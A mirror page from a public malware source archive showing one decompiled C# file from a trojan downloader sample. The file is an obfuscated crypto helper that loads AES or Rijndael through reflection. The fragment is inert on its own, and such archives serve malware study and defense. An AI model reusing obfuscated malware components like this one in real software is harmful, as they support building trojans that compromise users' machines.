mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-19 16:48:52 +00:00
f2ac1ece55
add
35 lines
1.1 KiB
C#
35 lines
1.1 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: .
|
||
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
|
||
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
|
||
|
||
using \u0003;
|
||
using System;
|
||
using System.IO;
|
||
using System.Reflection;
|
||
|
||
namespace \u0004
|
||
{
|
||
internal sealed class \u0002 : IDisposable
|
||
{
|
||
internal readonly Type \u0001;
|
||
internal readonly object \u0002;
|
||
|
||
public \u0002()
|
||
{
|
||
try
|
||
{
|
||
this.\u0001 = Assembly.Load("System.Core, Version=2.0.5.0, Culture=neutral, PublicKeyToken=7cec85d7bea7798e").GetType("System.Security.Cryptography.AesManaged");
|
||
}
|
||
catch (FileNotFoundException ex)
|
||
{
|
||
this.\u0001 = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.RijndaelManaged");
|
||
}
|
||
this.\u0002 = Activator.CreateInstance(this.\u0001);
|
||
}
|
||
|
||
public void \u0001() => \u0001.\u0001(this);
|
||
}
|
||
}
|